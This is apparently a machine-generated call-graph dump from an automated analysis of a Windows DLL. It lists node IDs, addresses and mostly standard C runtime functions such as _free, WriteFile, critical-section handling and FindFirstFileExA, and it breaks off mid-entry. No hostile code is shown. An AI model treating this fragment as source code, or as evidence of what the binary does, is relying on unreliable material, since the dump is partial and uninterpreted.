7103->7100 7104 2090544d ___std_exception_copy 26 API calls 7103->7104 7104->7100 6935 20904bdd 6936 20904c08 6935->6936 6937 20904bec 6935->6937 6939 20906d60 51 API calls 6936->6939 6937->6936 6938 20904bf2 6937->6938 6941 20906368 _free 20 API calls 6938->6941 6940 20904c0f GetModuleFileNameA 6939->6940 6942 20904c33 6940->6942 6943 20904bf7 6941->6943 6958 20904d01 6942->6958 6944 209062ac _abort 26 API calls 6943->6944 6946 20904c01 6944->6946 6950 20904c72 6953 20904d01 38 API calls 6950->6953 6951 20904c66 6952 20906368 _free 20 API calls 6951->6952 6957 20904c6b 6952->6957 6954 20904c88 6953->6954 6956 2090571e _free 20 API calls 6954->6956 6954->6957 6955 2090571e _free 20 API calls 6955->6946 6956->6957 6957->6955 6960 20904d26 6958->6960 6962 20904d86 6960->6962 6970 209070eb 6960->6970 6961 20904c50 6964 20904e76 6961->6964 6962->6961 6963 209070eb 38 API calls 6962->6963 6963->6962 6965 20904e8b 6964->6965 6966 20904c5d 6964->6966 6965->6966 6967 2090637b _abort 20 API calls 6965->6967 6966->6950 6966->6951 6968 20904eb9 6967->6968 6969 2090571e _free 20 API calls 6968->6969 6969->6966 6973 20907092 6970->6973 6974 209054a7 __fassign 38 API calls 6973->6974 6975 209070a6 6974->6975 6975->6960 6214 20907a80 6215 20907a8d 6214->6215 6216 2090637b _abort 20 API calls 6215->6216 6217 20907aa7 6216->6217 6218 2090571e _free 20 API calls 6217->6218 6219 20907ab3 6218->6219 6220 20907ad9 6219->6220 6221 2090637b _abort 20 API calls 6219->6221 6225 20907ae5 6220->6225 6226 20905eb7 6220->6226 6222 20907acd 6221->6222 6224 2090571e _free 20 API calls 6222->6224 6224->6220 6227 20905c45 _abort 5 API calls 6226->6227 6228 20905ede 6227->6228 6229 20905efc InitializeCriticalSectionAndSpinCount 6228->6229 6231 20905ee7 6228->6231 6229->6231 6230 20902ada _ValidateLocalCookies 5 API calls 6232 20905f13 6230->6232 6231->6230 6232->6220 7285 20908640 7288 20908657 7285->7288 7289 20908665 7288->7289 7290 20908679 7288->7290 7291 20906368 _free 20 API calls 7289->7291 7292 20908681 7290->7292 7293 20908693 7290->7293 7294 2090866a 7291->7294 7295 20906368 _free 20 API calls 7292->7295 7296 209054a7 __fassign 38 API calls 7293->7296 7299 20908652 7293->7299 7297 209062ac _abort 26 API calls 7294->7297 7298 20908686 7295->7298 7296->7299 7297->7299 7300 209062ac _abort 26 API calls 7298->7300 7300->7299 7105 20907103 GetCommandLineA GetCommandLineW 7106 20905303 7109 209050a5 7106->7109 7118 2090502f 7109->7118 7112 2090502f 5 API calls 7113 209050c3 7112->7113 7114 20905000 20 API calls 7113->7114 7115 209050ce 7114->7115 7116 20905000 20 API calls 7115->7116 7117 209050d9 7116->7117 7121 20905048 7118->7121 7119 20902ada _ValidateLocalCookies 5 API calls 7120 20905069 7119->7120 7120->7112 7121->7119 7301 2090af43 7302 2090af59 7301->7302 7303 2090af4d 7301->7303 7303->7302 7304 2090af52 CloseHandle 7303->7304 7304->7302 7305 2090a945 7307 2090a96d 7305->7307 7306 2090a9a5 7307->7306 7308 2090a997 7307->7308 7309 2090a99e 7307->7309 7314 2090aa17 7308->7314 7318 2090aa00 7309->7318 7315 2090aa20 7314->7315 7322 2090b19b 7315->7322 7319 2090aa20 7318->7319 7320 2090b19b __startOneArgErrorHandling 21 API calls 7319->7320 7321 2090a9a3 7320->7321 7324 2090b1da __startOneArgErrorHandling 7322->7324 7328 2090b25c __startOneArgErrorHandling 7324->7328 7332 2090b59e 7324->7332 7325 2090b286 7327 2090b292 7325->7327 7339 2090b8b2 7325->7339 7329 20902ada _ValidateLocalCookies 5 API calls 7327->7329 7328->7325 7335 209078a3 7328->7335 7331 2090a99c 7329->7331 7346 2090b5c1 7332->7346 7336 209078cb 7335->7336 7337 20902ada _ValidateLocalCookies 5 API calls 7336->7337 7338 209078e8 7337->7338 7338->7325 7340 2090b8d4 7339->7340 7341 2090b8bf 7339->7341 7343 20906368 _free 20 API calls 7340->7343 7342 2090b8d9 7341->7342 7344 20906368 _free 20 API calls 7341->7344 7342->7327 7343->7342 7345 2090b8cc 7344->7345 7345->7327 7347 2090b5ec __raise_exc 7346->7347 7348 2090b7e5 RaiseException 7347->7348 7349 2090b5bc 7348->7349 7349->7328 6976 2090a1c6 IsProcessorFeaturePresent 6977 20907bc7 6978 20907bd3 ___scrt_is_nonwritable_in_current_image 6977->6978 6979 20907c0a _abort 6978->6979 6985 20905671 RtlEnterCriticalSection 6978->6985 6981 20907be7 6982 20907f86 __fassign 20 API calls 6981->6982 6983 20907bf7 6982->6983 6986 20907c10 6983->6986 6985->6981 6989 209056b9 RtlLeaveCriticalSection 6986->6989 6988 20907c17 6988->6979 6989->6988 7350 20905348 7351 20903529 ___vcrt_uninitialize 8 API calls 7350->7351 7352 2090534f 7351->7352 7353 20907b48 7363 20908ebf 7353->7363 7357 20907b55 7376 2090907c 7357->7376 7360 20907b7f 7361 2090571e _free 20 API calls 7360->7361 7362 20907b8a 7361->7362 7380 20908ec8 7363->7380 7365 20907b50 7366 20908fdc 7365->7366 7367 20908fe8 ___scrt_is_nonwritable_in_current_image 7366->7367 7400 20905671 RtlEnterCriticalSection 7367->7400 7369 2090905e 7414 20909073 7369->7414 7371 20909032 RtlDeleteCriticalSection 7374 2090571e _free 20 API calls 7371->7374 7372 2090906a _abort 7372->7357 7375 20908ff3 7374->7375 7375->7369 7375->7371 7401 2090a09c 7375->7401 7377 20909092 7376->7377 7378 20907b64 RtlDeleteCriticalSection 7376->7378 7377->7378 7379 2090571e _free 20 API calls 7377->7379 7378->7357 7378->7360 7379->7378 7381 20908ed4 ___scrt_is_nonwritable_in_current_image 7380->7381 7390 20905671 RtlEnterCriticalSection 7381->7390 7383 20908f77 7395 20908f97 7383->7395 7386 20908f83 _abort 7386->7365 7388 20908e78 66 API calls 7389 20908ee3 7388->7389 7389->7383 7389->7388 7391 20907b94 RtlEnterCriticalSection 7389->7391 7392 20908f6d 7389->7392 7390->7389 7391->7389 7398 20907ba8 RtlLeaveCriticalSection 7392->7398 7394 20908f75 7394->7389 7399 209056b9 RtlLeaveCriticalSection 7395->7399 7397 20908f9e 7397->7386 7398->7394 7399->7397 7400->7375 7402 2090a0a8 ___scrt_is_nonwritable_in_current_image 7401->7402 7403 2090a0b9 7402->7403 7404 2090a0ce 7402->7404 7405 20906368 _free 20 API calls 7403->7405 7412 2090a0c9 _abort 7404->7412 7417 20907b94 RtlEnterCriticalSection 7404->7417 7407 2090a0be 7405->7407 7409 209062ac _abort 26 API calls 7407->7409 7408 2090a0ea 7418 2090a026 7408->7418 7409->7412 7411 2090a0f5 7434 2090a112 7411->7434 7412->7375 7682 209056b9 RtlLeaveCriticalSection 7414->7682 7416 2090907a 7416->7372 7417->7408 7419 2090a033 7418->7419 7421 2090a048 7418->7421 7420 20906368 _free 20 API calls 7419->7420 7422 2090a038 7420->7422 7426 2090a043 7421->7426 7437 20908e12 7421->7437 7424 209062ac _abort 26 API calls 7422->7424 7424->7426 7426->7411 7427 2090907c 20 API calls 7428 2090a064 7427->7428 7443 20907a5a 7428->7443 7430 2090a06a 7450 2090adce 7430->7450 7433 2090571e _free 20 API calls 7433->7426 7681 20907ba8 RtlLeaveCriticalSection 7434->7681 7436 2090a11a 7436->7412 7438 20908e2a 7437->7438 7440 20908e26 7437->7440 7439 20907a5a 26 API calls 7438->7439 7438->7440 7441 20908e4a 7439->7441 7440->7427 7465 20909a22 7441->7465 7444 20907a66 7443->7444 7445 20907a7b 7443->7445 7446 20906368 _free 20 API calls 7444->7446 7445->7430 7447 20907a6b 7446->7447 7448 209062ac _abort 26 API calls 7447->7448 7449 20907a76 7448->7449 7449->7430 7451 2090adf2 7450->7451 7452 2090addd 7450->7452 7453 2090ae2d 7451->7453 7458 2090ae19 7451->7458 7454 20906355 __dosmaperr 20 API calls 7452->7454 7455 20906355 __dosmaperr 20 API calls 7453->7455 7456 2090ade2 7454->7456 7459 2090ae32 7455->7459 7457 20906368 _free 20 API calls 7456->7457 7462 2090a070 7457->7462 7638 2090ada6 7458->7638 7461 20906368 _free 20 API calls 7459->7461 7463 2090ae3a 7461->7463 7462->7426 7462->7433 7464 209062ac _abort 26 API calls 7463->7464 7464->7462 7466 20909a2e ___scrt_is_nonwritable_in_current_image 7465->7466 7467 20909a36 7466->7467 7468 20909a4e 7466->7468 7490 20906355 7467->7490 7470 20909aec 7468->7470 7474 20909a83 7468->7474 7472 20906355 __dosmaperr 20 API calls 7470->7472 7475 20909af1 7472->7475 7473 20906368 _free 20 API calls 7476 20909a43 _abort 7473->7476 7493 20908c7b RtlEnterCriticalSection 7474->7493 7478 20906368 _free 20 API calls 7475->7478 7476->7440 7480 20909af9 7478->7480 7479 20909a89 7481 20909aa5 7479->7481 7482 20909aba 7479->7482 7483 209062ac _abort 26 API calls 7480->7483 7485 20906368 _free 20 API calls 7481->7485 7494 20909b0d 7482->7494 7483->7476 7486 20909aaa 7485->7486 7487 20906355 __dosmaperr 20 API calls 7486->7487 7488 20909ab5 7487->7488 7545 20909ae4 7488->7545 7491 20905b7a _abort 20 API calls 7490->7491 7492 2090635a 7491->7492 7492->7473 7493->7479 7495 20909b3b 7494->7495 7532 20909b34 7494->7532 7496 20909b5e 7495->7496 7497 20909b3f 7495->7497 7501 20909b92 7496->7501 7505 20909baf 7496->7505 7498 20906355 __dosmaperr 20 API calls 7497->7498 7500 20909b44 7498->7500 7499 20902ada _ValidateLocalCookies 5 API calls 7502 20909d15 7499->7502 7503 20906368 _free 20 API calls 7500->7503 7506 20906355 __dosmaperr 20 API calls 7501->7506 7502->7488 7507 20909b4b 7503->7507 7504 20909bc5 7551 209096b2 7504->7551 7505->7504 7548 2090a00b 7505->7548 7510 20909b97 7506->7510 7512 209062ac _abort 26 API calls 7507->7512 7511 20906368 _free 20 API calls 7510->7511 7514 20909b9f 7511->7514 7512->7532 7517 209062ac _abort 26 API calls 7514->7517 7515 20909bd3 7520 20909bd7 7515->7520 7521 20909bf9 7515->7521 7516 20909c0c 7518 20909c20 7516->7518 7519 20909c66 WriteFile 7516->7519 7517->7532 7524 20909c56 7518->7524 7525 20909c28 7518->7525 7522 20909c89 GetLastError 7519->7522 7528 20909bef 7519->7528 7526 20909ccd 7520->7526 7558 20909645 7520->7558 7563 20909492 GetConsoleCP 7521->7563 7522->7528 7589 20909728 7524->7589 7529 20909c46 7525->7529 7530 20909c2d 7525->7530 7526->7532 7533 20906368 _free 20 API calls 7526->7533 7528->7526 7528->7532 7536 20909ca9 7528->7536 7581 209098f5 7529->7581 7530->7526 7574 20909807 7530->7574 7532->7499 7535 20909cf2 7533->7535 7538 20906355 __dosmaperr 20 API calls 7535->7538 7539 20909cb0 7536->7539 7540 20909cc4 7536->7540 7538->7532 7541 20906368 _free 20 API calls 7539->7541 7596 20906332 7540->7596 7543 20909cb5 7541->7543 7544 20906355 __dosmaperr 20 API calls 7543->7544 7544->7532 7637 20908c9e RtlLeaveCriticalSection 7545->7637 7547 20909aea 7547->7476 7601 20909f8d 7548->7601 7623 20908dbc 7551->7623 7553 209096c2 7554 209096c7 7553->7554 7555 20905af6 _abort 38 API calls 7553->7555 7554->7515 7554->7516 7556 209096ea 7555->7556 7556->7554 7557 20909708 GetConsoleMode 7556->7557 7557->7554 7561 2090969f 7558->7561 7562 2090966a 7558->7562 7559 209096a1 GetLastError 7559->7561 7560 2090a181 WriteConsoleW CreateFileW 7560->7562 7561->7528 7562->7559 7562->7560 7562->7561 7568 20909607 7563->7568 7572 209094f5 7563->7572 7564 20902ada _ValidateLocalCookies 5 API calls 7565 20909641 7564->7565 7565->7528 7567 2090957b WideCharToMultiByte 7567->7568 7569 209095a1 WriteFile 7567->7569 7568->7564 7571 2090962a GetLastError 7569->7571 7569->7572 7570 209079e6 40 API calls __fassign 7570->7572 7571->7568 7572->7567 7572->7568 7572->7570 7573 209095d2 WriteFile 7572->7573 7632 20907c19 7572->7632 7573->7571 7573->7572 7576 20909816 7574->7576 7575 209098d8 7578 20902ada _ValidateLocalCookies 5 API calls 7575->7578 7576->7575 7577 20909894 WriteFile 7576->7577 7577->7576 7579 209098da GetLastError 7577->7579 7580 209098f1 7578->7580 7579->7575 7580->7528 7588 20909904 7581->7588 7582 20909a0f 7583 20902ada _ValidateLocalCookies 5 API calls 7582->7583 7584 20909a1e 7583->7584 7584->7528 7585 20909986 WideCharToMultiByte 7586 20909a07 GetLastError 7585->7586 7587 209099bb WriteFile 7585->7587 7586->7582 7587->7586 7587->7588 7588->7582 7588->7585 7588->7587 7593 20909737 7589->7593 7590 209097ea 7591 20902ada _ValidateLocalCookies 5 API calls 7590->7591 7594 20909803 7591->7594 7592 209097a9 WriteFile 7592->7593 7595 209097ec GetLastError 7592->7595 7593->7590 7593->7592 7594->7528 7595->7590 7597 20906355 __dosmaperr 20 API calls 7596->7597 7598 2090633d _free 7597->7598 7599 20906368 _free 20 API calls 7598->7599 7600 20906350 7599->7600 7600->7532 7610 20908d52 7601->7610 7603 20909f9f 7604 20909fa7 7603->7604 7605 20909fb8 SetFilePointerEx 7603->7605 7606 20906368 _free 20 API calls 7604->7606 7607 20909fd0 GetLastError 7605->7607 7608 20909fac 7605->7608 7606->7608 7609 20906332 __dosmaperr 20 API calls 7607->7609 7608->7504 7609->7608 7611 20908d74 7610->7611 7612 20908d5f 7610->7612 7615 20906355 __dosmaperr 20 API calls 7611->7615 7618 20908d99 7611->7618 7613 20906355 __dosmaperr 20 API calls 7612->7613 7614 20908d64 7613->7614 7617 20906368 _free 20 API calls 7614->7617 7616 20908da4 7615->7616 7619 20906368 _free 20 API calls 7616->7619 7620 20908d6c 7617->7620 7618->7603 7621 20908dac 7619->7621 7620->7603 7622 209062ac _abort 26 API calls 7621->7622 7622->7620 7624 20908dd6 7623->7624 7625 20908dc9 7623->7625 7627 20908de2 7624->7627 7628 20906368 _free 20 API calls 7624->7628 7626 20906368 _free 20 API calls 7625->7626 7629 20908dce 7626->7629 7627->7553 7630 20908e03 7628->7630 7629->7553 7631 209062ac _abort 26 API calls 7630->7631 7631->7629 7633 20905af6 _abort 38 API calls 7632->7633 7634 20907c24 7633->7634 7635 20907a00 __fassign 38 API calls 7634->7635 7636 20907c34 7635->7636 7636->7572 7637->7547 7641 2090ad24 7638->7641 7640 2090adca 7640->7462 7642 2090ad30 ___scrt_is_nonwritable_in_current_image 7641->7642 7652 20908c7b RtlEnterCriticalSection 7642->7652 7644 2090ad3e 7645 2090ad70 7644->7645 7646 2090ad65 7644->7646 7648 20906368 _free 20 API calls 7645->7648 7653 2090ae4d 7646->7653 7649 2090ad6b 7648->7649 7668 2090ad9a 7649->7668 7651 2090ad8d _abort 7651->7640 7652->7644 7654 20908d52 26 API calls 7653->7654 7655 2090ae5d 7654->7655 7656 2090ae63 7655->7656 7658 2090ae95 7655->7658 7660 20908d52 26 API calls 7655->7660 7671 20908cc1 7656->7671 7658->7656 7661 20908d52 26 API calls 7658->7661 7664 2090ae8c 7660->7664 7662 2090aea1 CloseHandle 7661->7662 7662->7656 7665 2090aead GetLastError 7662->7665 7663 2090aedd 7663->7649 7667 20908d52 26 API calls 7664->7667 7665->7656 7666 20906332 __dosmaperr 20 API calls 7666->7663 7667->7658 7680 20908c9e RtlLeaveCriticalSection 7668->7680 7670 2090ada4 7670->7651 7672 20908cd0 7671->7672 7673 20908d37 7671->7673 7672->7673 7678 20908cfa 7672->7678 7674 20906368 _free 20 API calls 7673->7674 7675 20908d3c 7674->7675 7676 20906355 __dosmaperr 20 API calls 7675->7676 7677 20908d27 7676->7677 7677->7663 7677->7666 7678->7677 7679 20908d21 SetStdHandle 7678->7679 7679->7677 7680->7670 7681->7436 7682->7416 6233 20908a89 6236 20906d60 6233->6236 6237 20906d69 6236->6237 6238 20906d72 6236->6238 6240 20906c5f 6237->6240 6241 20905af6 _abort 38 API calls 6240->6241 6242 20906c6c 6241->6242 6260 20906d7e 6242->6260 6244 20906c74 6269 209069f3 6244->6269 6247 20906c8b 6247->6238 6250 20906cce 6253 2090571e _free 20 API calls 6250->6253 6253->6247 6254 20906cc9 6255 20906368 _free 20 API calls 6254->6255 6255->6250 6256 20906d12 6256->6250 6293 209068c9 6256->6293 6257 20906ce6 6257->6256 6258 2090571e _free 20 API calls 6257->6258 6258->6256 6261 20906d8a ___scrt_is_nonwritable_in_current_image 6260->6261 6262 20905af6 _abort 38 API calls 6261->6262 6264 20906d94 6262->6264 6265 20906e18 _abort 6264->6265 6267 209055a8 _abort 38 API calls 6264->6267 6268 2090571e _free 20 API calls 6264->6268 6296 20905671 RtlEnterCriticalSection 6264->6296 6297 20906e0f 6264->6297 6265->6244 6267->6264 6268->6264 6301 209054a7 6269->6301 6272 20906a14 GetOEMCP 6274 20906a3d 6272->6274 6273 20906a26 6273->6274 6275 20906a2b GetACP 6273->6275 6274->6247 6276 209056d0 6274->6276 6275->6274 6277 2090570e 6276->6277 6278 209056de _abort 6276->6278 6279 20906368 _free 20 API calls 6277->6279 6278->6277 6280 209056f9 RtlAllocateHeap 6278->6280 6282 2090474f _abort 7 API calls 6278->6282 6281 2090570c 6279->6281 6280->6278 6280->6281 6281->6250 6283 20906e20 6281->6283 6282->6278 6284 209069f3 40 API calls 6283->6284 6286 20906e3f 6284->6286 6285 20906e46 6287 20902ada _ValidateLocalCookies 5 API calls 6285->6287 6286->6285 6289 20906e90 IsValidCodePage 6286->6289 6292 20906eb5 ___scrt_fastfail 6286->6292 6288 20906cc1 6287->6288 6288->6254 6288->6257 6289->6285 6290 20906ea2 GetCPInfo 6289->6290 6290->6285 6290->6292 6448 20906acb GetCPInfo 6292->6448 6521 20906886 6293->6521 6295 209068ed 6295->6250 6296->6264 6300 209056b9 RtlLeaveCriticalSection 6297->6300 6299 20906e16 6299->6264 6300->6299 6302 209054c4 6301->6302 6303 209054ba 6301->6303 6302->6303 6304 20905af6 _abort 38 API calls 6302->6304 6303->6272 6303->6273 6305 209054e5 6304->6305 6309 20907a00 6305->6309 6310 20907a13 6309->6310 6311 209054fe 6309->6311 6310->6311 6317 20907f0f 6310->6317 6313 20907a2d 6311->6313 6314 20907a40 6313->6314 6316 20907a55 6313->6316 6315 20906d7e __fassign 38 API calls 6314->6315 6314->6316 6315->6316 6316->6303 6318 20907f1b ___scrt_is_nonwritable_in_current_image 6317->6318 6319 20905af6 _abort 38 API calls 6318->6319 6320 20907f24 6319->6320 6321 20907f72 _abort 6320->6321 6329 20905671 RtlEnterCriticalSection 6320->6329 6321->6311 6323 20907f42 6330 20907f86 6323->6330 6328 209055a8 _abort 38 API calls 6328->6321 6329->6323 6331 20907f56 6330->6331 6332 20907f94 __fassign 6330->6332 6334 20907f75 6331->6334 6332->6331 6337 20907cc2 6332->6337 6447 209056b9 RtlLeaveCriticalSection 6334->6447 6336 20907f69 6336->6321 6336->6328 6338 20907d42 6337->6338 6342 20907cd8 6337->6342 6339 20907d90 6338->6339 6341 2090571e _free 20 API calls 6338->6341 6405 20907e35 6339->6405 6343 20907d64 6341->6343 6342->6338 6344 20907d0b 6342->6344 6349 2090571e _free 20 API calls 6342->6349 6345 2090571e _free 20 API calls 6343->6345 6346 20907d2d 6344->6346 6351 2090571e _free 20 API calls 6344->6351 6347 20907d77 6345->6347 6348 2090571e _free 20 API calls 6346->6348 6350 2090571e _free 20 API calls 6347->6350 6352 20907d37 6348->6352 6354 20907d00 6349->6354 6356 20907d85 6350->6356 6357 20907d22 6351->6357 6358 2090571e _free 20 API calls 6352->6358 6353 20907dfe 6359 2090571e _free 20 API calls 6353->6359 6365 209090ba 6354->6365 6355 20907d9e 6355->6353 6361 2090571e 20 API calls _free 6355->6361 6362 2090571e _free 20 API calls 6356->6362 6393 209091b8 6357->6393 6358->6338 6364 20907e04 6359->6364 6361->6355 6362->6339 6364->6331 6366 209091b4 6365->6366 6367 209090cb 6365->6367 6366->6344 6368 209090dc 6367->6368 6370 2090571e _free 20 API calls 6367->6370 6369 209090ee 6368->6369 6371 2090571e _free 20 API calls 6368->6371 6372 20909100 6369->6372 6373 2090571e _free 20 API calls 6369->6373 6370->6368 6371->6369 6374 20909112 6372->6374 6375 2090571e _free 20 API calls 6372->6375 6373->6372 6376 20909124 6374->6376 6378 2090571e _free 20 API calls 6374->6378 6375->6374 6377 20909136 6376->6377 6379 2090571e _free 20 API calls 6376->6379 6380 20909148 6377->6380 6381 2090571e _free 20 API calls 6377->6381 6378->6376 6379->6377 6382 2090915a 6380->6382 6383 2090571e _free 20 API calls 6380->6383 6381->6380 6384 2090916c 6382->6384 6386 2090571e _free 20 API calls 6382->6386 6383->6382 6385 2090917e 6384->6385 6387 2090571e _free 20 API calls 6384->6387 6388 20909190 6385->6388 6389 2090571e _free 20 API calls 6385->6389 6386->6384 6387->6385 6390 209091a2 6388->6390 6391 2090571e _free 20 API calls 6388->6391 6389->6388 6390->6366 6392 2090571e _free 20 API calls 6390->6392 6391->6390 6392->6366 6394 209091c5 6393->6394 6404 2090921d 6393->6404 6395 209091d5 6394->6395 6396 2090571e _free 20 API calls 6394->6396 6397 209091e7 6395->6397 6399 2090571e _free 20 API calls 6395->6399 6396->6395 6398 209091f9 6397->6398 6400 2090571e _free 20 API calls 6397->6400 6401 2090571e _free 20 API calls 6398->6401 6402 2090920b 6398->6402 6399->6397 6400->6398 6401->6402 6403 2090571e _free 20 API calls 6402->6403 6402->6404 6403->6404 6404->6346 6406 20907e60 6405->6406 6407 20907e42 6405->6407 6406->6355 6407->6406 6411 2090925d 6407->6411 6410 2090571e _free 20 API calls 6410->6406 6412 20907e5a 6411->6412 6413 2090926e 6411->6413 6412->6410 6414 20909221 __fassign 20 API calls 6413->6414 6415 20909276 6414->6415 6416 20909221 __fassign 20 API calls 6415->6416 6417 20909281 6416->6417 6418 20909221 __fassign 20 API calls 6417->6418 6419 2090928c 6418->6419 6420 20909221 __fassign 20 API calls 6419->6420 6421 20909297 6420->6421 6422 20909221 __fassign 20 API calls 6421->6422 6423 209092a5 6422->6423 6424 2090571e _free 20 API calls 6423->6424 6425 209092b0 6424->6425 6426 2090571e _free 20 API calls 6425->6426 6427 209092bb 6426->6427 6428 2090571e _free 20 API calls 6427->6428 6429 209092c6 6428->6429 6430 20909221 __fassign 20 API calls 6429->6430 6431 209092d4 6430->6431 6432 20909221 __fassign 20 API calls 6431->6432 6433 209092e2 6432->6433 6434 20909221 __fassign 20 API calls 6433->6434 6435 209092f3 6434->6435 6436 20909221 __fassign 20 API calls 6435->6436 6437 20909301 6436->6437 6438 20909221 __fassign 20 API calls 6437->6438 6439 2090930f 6438->6439 6440 2090571e _free 20 API calls 6439->6440 6441 2090931a 6440->6441 6442 2090571e _free 20 API calls 6441->6442 6443 20909325 6442->6443 6444 2090571e _free 20 API calls 6443->6444 6445 20909330 6444->6445 6446 2090571e _free 20 API calls 6445->6446 6446->6412 6447->6336 6449 20906baf 6448->6449 6450 20906b05 6448->6450 6452 20902ada _ValidateLocalCookies 5 API calls 6449->6452 6458 209086e4 6450->6458 6454 20906c5b 6452->6454 6454->6285 6457 20908a3e 43 API calls 6457->6449 6459 209054a7 __fassign 38 API calls 6458->6459 6460 20908704 MultiByteToWideChar 6459->6460 6462 209087da 6460->6462 6464 20908742 6460->6464 6465 20902ada _ValidateLocalCookies 5 API calls 6462->6465 6463 20908763 ___scrt_fastfail 6466 209087d4 6463->6466 6470 209087a8 MultiByteToWideChar 6463->6470 6464->6463 6467 209056d0 21 API calls 6464->6467 6468 20906b66 6465->6468 6477 20908801 6466->6477 6467->6463 6472 20908a3e 6468->6472 6470->6466 6471 209087c4 GetStringTypeW 6470->6471 6471->6466 6473 209054a7 __fassign 38 API calls 6472->6473 6474 20908a51 6473->6474 6481 20908821 6474->6481 6478 2090880d 6477->6478 6479 2090881e 6477->6479 6478->6479 6480 2090571e _free 20 API calls 6478->6480 6479->6462 6480->6479 6482 2090883c 6481->6482 6483 20908862 MultiByteToWideChar 6482->6483 6484 20908a16 6483->6484 6485 2090888c 6483->6485 6486 20902ada _ValidateLocalCookies 5 API calls 6484->6486 6489 209056d0 21 API calls 6485->6489 6491 209088ad 6485->6491 6487 20906b87 6486->6487 6487->6457 6488 209088f6 MultiByteToWideChar 6490 2090890f 6488->6490 6503 20908962 6488->6503 6489->6491 6508 20905f19 6490->6508 6491->6488 6491->6503 6493 20908801 __freea 20 API calls 6493->6484 6495 20908939 6499 20905f19 11 API calls 6495->6499 6495->6503 6496 20908992 6500 20908a07 6496->6500 6502 20905f19 11 API calls 6496->6502 6497 20908971 6497->6496 6498 209056d0 21 API calls 6497->6498 6498->6496 6499->6503 6501 20908801 __freea 20 API calls 6500->6501 6501->6503 6504 209089e6 6502->6504 6503->6493 6504->6500 6505 209089f5 WideCharToMultiByte 6504->6505 6505->6500 6506 20908a35 6505->6506 6507 20908801 __freea 20 API calls 6506->6507 6507->6503 6509 20905c45 _abort 5 API calls 6508->6509 6510 20905f40 6509->6510 6514 20905f49 6510->6514 6516 20905fa1 6510->6516 6513 20902ada _ValidateLocalCookies 5 API calls 6515 20905f9b 6513->6515 6514->6513 6515->6495 6515->6497 6515->6503 6517 20905c45 _abort 5 API calls 6516->6517 6518 20905fc8 6517->6518 6519 20902ada _ValidateLocalCookies 5 API calls 6518->6519 6520 20905f89 LCMapStringW 6519->6520 6520->6514 6522 20906892 ___scrt_is_nonwritable_in_current_image 6521->6522 6529 20905671 RtlEnterCriticalSection 6522->6529 6524 2090689c 6530 209068f1 6524->6530 6528 209068b5 _abort 6528->6295 6529->6524 6542 20907011 6530->6542 6532 2090693f 6533 20907011 26 API calls 6532->6533 6534 2090695b 6533->6534 6535 20907011 26 API calls 6534->6535 6536 20906979 6535->6536 6537 209068a9 6536->6537 6538 2090571e _free 20 API calls 6536->6538 6539 209068bd 6537->6539 6538->6537 6556 209056b9 RtlLeaveCriticalSection 6539->6556 6541 209068c7 6541->6528 6543 20907022 6542->6543 6552 2090701e 6542->6552 6544 20907029 6543->6544 6546 2090703c ___scrt_fastfail 6543->6546 6545 20906368 _free 20 API calls 6544->6545 6547 2090702e 6545->6547 6549 20907073 6546->6549 6550 2090706a 6546->6550 6546->6552 6548 209062ac _abort 26 API calls 6547->6548 6548->6552 6549->6552 6554 20906368 _free 20 API calls 6549->6554 6551 20906368 _free 20 API calls 6550->6551 6553 2090706f 6551->6553 6552->6532 6555 209062ac _abort 26 API calls 6553->6555 6554->6553 6555->6552 6556->6541 7683 20902049 7684 20902055 ___scrt_is_nonwritable_in_current_image 7683->7684 7685 209020d3 7684->7685 7686 2090207d 7684->7686 7696 2090205e 7684->7696 7687 20902639 ___scrt_fastfail 4 API calls 7685->7687 7697 2090244c 7686->7697 7689 209020da 7687->7689 7690 20902082 7706 20902308 7690->7706 7692 20902087 __RTC_Initialize 7709 209020c4 7692->7709 7694 2090209f 7712 2090260b 7694->7712 7698 20902451 ___scrt_release_startup_lock 7697->7698 7699 20902455 7698->7699 7702 20902461 7698->7702 7700 2090527a _abort 20 API calls 7699->7700 7701 2090245f 7700->7701 7701->7690 7703 2090246e 7702->7703 7704 2090499b _abort 28 API calls 7702->7704 7703->7690 7705 20904bbd 7704->7705 7705->7690 7718 209034c7 RtlInterlockedFlushSList 7706->7718 7708 20902312 7708->7692 7720 2090246f 7709->7720 7711 209020c9 ___scrt_release_startup_lock 7711->7694 7713 20902617 7712->7713 7714 2090262d 7713->7714 7728 209053ed 7713->7728 7714->7696 7717 20903529 ___vcrt_uninitialize 8 API calls 7717->7714 7719 209034d7 7718->7719 7719->7708 7725 209053ff 7720->7725 7723 2090391b ___vcrt_uninitialize_ptd 6 API calls 7724 2090354d 7723->7724 7724->7711 7726 20905c2b 11 API calls 7725->7726 7727 20902476 7726->7727 7727->7723 7731 209074da 7728->7731 7734 209074f3 7731->7734 7732 20902ada _ValidateLocalCookies 5 API calls 7733 20902625 7732->7733 7733->7717 7734->7732 6557 2090508a 6558 209050a2 6557->6558 6559 2090509c 6557->6559 6561 20905000 6559->6561 6565 2090500d 6561->6565 6566 2090502a 6561->6566 6562 20905024 6564 2090571e _free 20 API calls 6562->6564 6563 2090571e _free 20 API calls 6563->6565 6564->6566 6565->6562 6565->6563 6566->6558 7122 2090220c 7123 20902215 7122->7123 7124 2090221a dllmain_dispatch 7122->7124 7126 209022b1 7123->7126 7127 209022c7 7126->7127 7129 209022d0 7127->7129 7130 20902264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7127->7130 7129->7124 7130->7129 7735 2090724e GetProcessHeap 7736 2090284f 7737 20902882 std::exception::exception 27 API calls 7736->7737 7738 2090285d 7737->7738 6990 209063f0 6991 20906400 6990->6991 7000 20906416 6990->7000 6992 20906368 _free 20 API calls 6991->6992 6993 20906405 6992->6993 6994 209062ac _abort 26 API calls 6993->6994 6996 2090640f 6994->6996 6995 20904e76 20 API calls 7001 209064e5 6995->7001 6997 20906480 6997->6995 6997->6997 6998 209064ee 7002 2090571e _free 20 API calls 6998->7002 7000->6997 7003 20906561 7000->7003 7009 20906580 7000->7009 7001->6998 7006 20906573 7001->7006 7020 209085eb 7001->7020 7002->7003 7029 2090679a 7003->7029 7007 209062bc _abort 11 API calls 7006->7007 7008 2090657f 7007->7008 7010 2090658c 7009->7010 7010->7010 7011 2090637b _abort 20 API calls 7010->7011 7012 209065ba 7011->7012 7013 209085eb 26 API calls 7012->7013 7014 209065e6 7013->7014 7015 209062bc _abort 11 API calls 7014->7015 7016 20906615 ___scrt_fastfail 7015->7016 7017 209066b6 FindFirstFileExA 7016->7017 7018 20906705 7017->7018 7019 20906580 26 API calls 7018->7019 7021 2090853a 7020->7021 7024 2090854f 7021->7024 7026 20908554 7021->7026 7027 